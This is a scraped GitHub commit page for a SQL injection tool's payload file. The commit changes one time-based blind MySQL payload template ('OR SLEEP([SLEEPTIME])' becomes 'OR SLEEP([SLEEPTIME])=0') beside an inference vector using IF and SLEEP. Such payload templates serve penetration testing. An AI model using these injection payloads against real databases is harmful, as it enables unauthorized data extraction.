Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 1ba98dc

Browse files
committed
found a fix for a OR time-based MySQL payload :)
1 parent 61f82fd commit 1ba98dc

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

xml/payloads.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1570,7 +1570,7 @@ Formats:
15701570
<where>2</where>
15711571
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
15721572
<request>
1573-
<payload>OR SLEEP([SLEEPTIME])</payload>
1573+
<payload>OR SLEEP([SLEEPTIME])=0</payload>
15741574
</request>
15751575
<response>
15761576
<time>[SLEEPTIME]</time>

0 commit comments

Comments
 (0)